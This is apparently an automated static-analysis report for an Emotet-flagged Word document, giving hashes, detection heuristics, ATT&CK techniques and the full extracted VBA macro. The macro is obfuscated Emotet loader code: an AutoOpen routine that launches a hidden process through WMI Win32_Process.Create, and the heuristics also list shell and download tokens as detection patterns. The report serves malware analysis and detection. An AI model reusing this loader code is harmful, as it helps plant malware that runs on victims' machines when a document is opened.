Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 fa9052ec297d3951…

MALICIOUS

Office (OLE)

133.9 KB Created: 2019-05-21 07:46:00 Authoring application: Microsoft Office Word First seen: 2021-08-20
MD5: 4d478c33b8134fa3553362d1d9648cb5 SHA-1: 7204c708eecf449af04acaa9537e4bfeea625e13 SHA-256: fa9052ec297d39514aec2cdbdf04a5bb53e0e8a67760070e56e09e43d4acf738
310 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains critical heuristic firings indicating an obfuscated auto-exec VBA loader that uses WMI to launch processes. ClamAV also identifies it as Emotet. The VBA macro code, though obfuscated, contains autoopen and GetObject calls, consistent with a downloader attempting to execute a second-stage payload. The presence of WMI process creation suggests an attempt to execute arbitrary code.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    autoopen( _
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5808 bytes
SHA-256: 0c89221e537bf357fcba350de690c01166c38552d4601e2b045def3c757e435f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "D2722316"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "o59071, 0, 0, MSForms, TextBox"
Attribute VB_Control = "z4641307, 1, 1, MSForms, TextBox"

Attribute VB_Name = "Y12454"
Sub T58828()
   Dim F80871()
      ReDim F80871(53266)
      F80871(53148) = 955 + Int(U946439) + B2152371 + Int(656) + z1174585 + Y43_07_ + 128 + z59643
      F80871(53136) = 103 + Int(l95388) + k2_64347 + Int(769) + Q780561 + b31432 + 615 + E74504
      F80871(53220) = 961 + Int(f35_768) + E_198123 + Int(438) + R376682 + n5_10550 + 557 + i156014
      F80871(53121) = 958 + Int(i00845) + X0474_81 + Int(994) + i38961 + B7642072 + 531 + c19_29
   Dim J9992_8()
      ReDim J9992_8(53266)
      J9992_8(53148) = 559 + Int(E3_88_) + X88623 + Int(582) + U868863 + R_908959 + 136 + c792917
      J9992_8(53136) = 776 + Int(X12190) + T88__74 + Int(338) + w15189 + v4_80625 + 900 + o009392
      J9992_8(53220) = 893 + Int(K955707) + U44__47 + Int(700) + s68580 + O246_3 + 189 + b348766
      J9992_8(53121) = 528 + Int(v_67148) + b49769 + Int(302) + r51938 + c74_2_4 + 346 + o73336
End Sub
Sub _
autoopen( _
)
   Dim S55338()
      ReDim S55338(87025)
      S55338(86925) = 197 + Int(r0557287) + o05854 + Int(864) + S172_4 + c332_6_ + 179 + P2747328
      S55338(86900) = 61 + Int(f895089) + X259354_ + Int(832) + b057_81 + A4369_6 + 489 + p2_052
      S55338(86890) = 714 + Int(J_3983) + N3638408 + Int(140) + A3092974 + B5390359 + 502 + h23430
      S55338(86859) = 113 + Int(J34900) + F12_69 + Int(232) + T915_8 + T1760066 + 528 + G5___486
B99_74
   Dim a_168059()
      ReDim a_168059(87025)
      a_168059(86925) = 305 + Int(I4702167) + X17421 + Int(605) + c9264651 + T9029141 + 182 + j246829
      a_168059(86900) = 158 + Int(F273_1) + Q91093 + Int(183) + q3015750 + A8580883 + 692 + p1600_49
      a_168059(86890) = 361 + Int(F3__22) + H44496_ + Int(79) + G_6301 + J78123 + 658 + F806673
      a_168059(86859) = 174 + Int(m84_028) + r05_90 + Int(974) + D3172_05 + h441375 + 633 + n_51509
End Sub
Sub B99_74()
   Dim V43261()
      ReDim V43261(87025)
      V43261(86925) = 286 + Int(U_3194_) + w9826_ + Int(576) + L128_9_ + d_37556 + 729 + z_049476
      V43261(86900) = 429 + Int(j9211949) + A4955_5 + Int(304) + m100658 + T3728_2 + 76 + i2__3_7
      V43261(86890) = 82 + Int(T232737) + i82_58 + Int(175) + F630__ + o270048 + 974 + B56544
      V43261(86859) = 746 + Int(Z373165_) + b34525 + Int(472) + l45_652 + j2021333 + 219 + V64395_
Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
   Dim L7913123()
      ReDim L7913123(87025)
      L7913123(86925) = 275 + Int(S_115665) + X74410 + Int(100) + D6_491 + E9__7606 + 125 + f15568
      L7913123(86900) = 1 + Int(R988823) + k419957 + Int(631) + H69_0112 + a79736 + 280 + Q63515
      L7913123(86890) = 676 + Int(Q_00623_) + o78_7402 + Int(536) + N254040 + b3129848 + 35 + L_55886
      L7913123(86859) = 675 + Int(O27310) + j94_947 + Int(602) + v132_1 + m17203 + 897 + D50900
j9118_6. _
ShowWindow = 422843 - 422843
   Dim a_213263()
      ReDim a_213263(87025)
      a_213263(86925) = 921 + Int(z407_800) + f06534 + Int(526) + L817474 + n041_480 + 646 + p188932
      a_213263(86900) = 497 + Int(w443_3) + c_732269 + Int(542) + o48210 + T0260269 + 562 + w1822506
      a_213263(86890) = 909 + Int(z83360) + R59370 + Int(451) + H74_09_2 + i92445 + 263 + L787657
      a_213263(86859) = 400 + Int(F48_2543) + z41598 + Int(430) + V04_13 + w074485 + 971 + r1__3205
Set K85731 = GetObject(v752570("winmgmts:Win32" + "_Process"))
   Dim V0972258()
      ReDim V0972258(87025)
      V0972258(86925) = 971 + Int(O25473_) + j33_07 + Int(826) + X55_29 + D920521 + 276 + W2725_04
      V0972258(86900) = 397 + Int(J356767) + B77_33 + Int(127) + F28395 + O162951 + 976 + m597644
      V0972258(86890) = 815 + Int(j_29614) + z614_3 + Int(544) + M36_48 + a6840_ + 572 + P087927_
      V0972258(86859) = 925 + Int(C94_0277) + h5556908 + Int(60) + k1_8966 + A588_828 + 484 + w638542
K85731.Create N054495 + "po" + j26283 + D2722316.z4641307 + D2722316.o59071 + X9833436, O3643039, j9118_6, R8_855
   Dim O080_87()
      ReDim O080_87(87025)
      O080_87(86925) = 830 + Int(n21_787) + M04747 + Int(547) + Y1487_49 + u572492 + 416 + P6359982
      O080_87(86900) = 514 + Int(R255531) + f04159 + Int(666) + q237_8_0 + o4231_73 + 122 + Z1092533
      O080_87(86890) = 38 + Int(v38268) + W6539057 + Int(270) + c6__4240 + l80_85 + 966 + Z0144610
      O080_87(86859) = 93 + Int(r_2357_3) + H0668073 + Int(98) + F57_637 + S30259 + 539 + F592_4_
End Sub
Function v752570(j600346)
   Dim S2_4_8_1()
      ReDim S2_4_8_1(21784)
      S2_4_8_1(21701) = 701 + Int(u156924) + A5950875 + Int(457) + f13171 + B0837203 + 19 + E8299756
      S2_4_8_1(21663) = 423 + Int(l3___09) + m_63_422 + Int(273) + b_68763 + K691726 + 291 + B68732
      S2_4_8_1(21658) = 220 + Int(V5435409) + T683_8 + Int(248) + i00051_ + V4656521 + 912 + m859_4
      S2_4_8_1(21694) = 783 + Int(k0__94) + c036414 + Int(356) + z32_9_08 + E023793 + 533 + f256511
v752570 = (j600346)
   Dim w0799_35()
      ReDim w0799_35(21784)
      w0799_35(21701) = 234 + Int(w13635_1) + E9_075 + Int(995) + Z902_68 + D64339_5 + 205 + B65959
      w0799_35(21663) = 258 + Int(Z7960_3) + P_711_31 + Int(896) + u33024 + C92409 + 406 + m4370602
      w0799_35(21658) = 635 + Int(Z74_888) + u56_012 + Int(155) + P8554747 + Q9657055 + 239 + F23050
      w0799_35(21694) = 323 + Int(P9508812) + T277120 + Int(139) + f9_273 + d09_03 + 429 + j80944
End Function


Attribute VB_Name = "Z62968"

Open this report in the interactive analyzer, or submit your own file for analysis.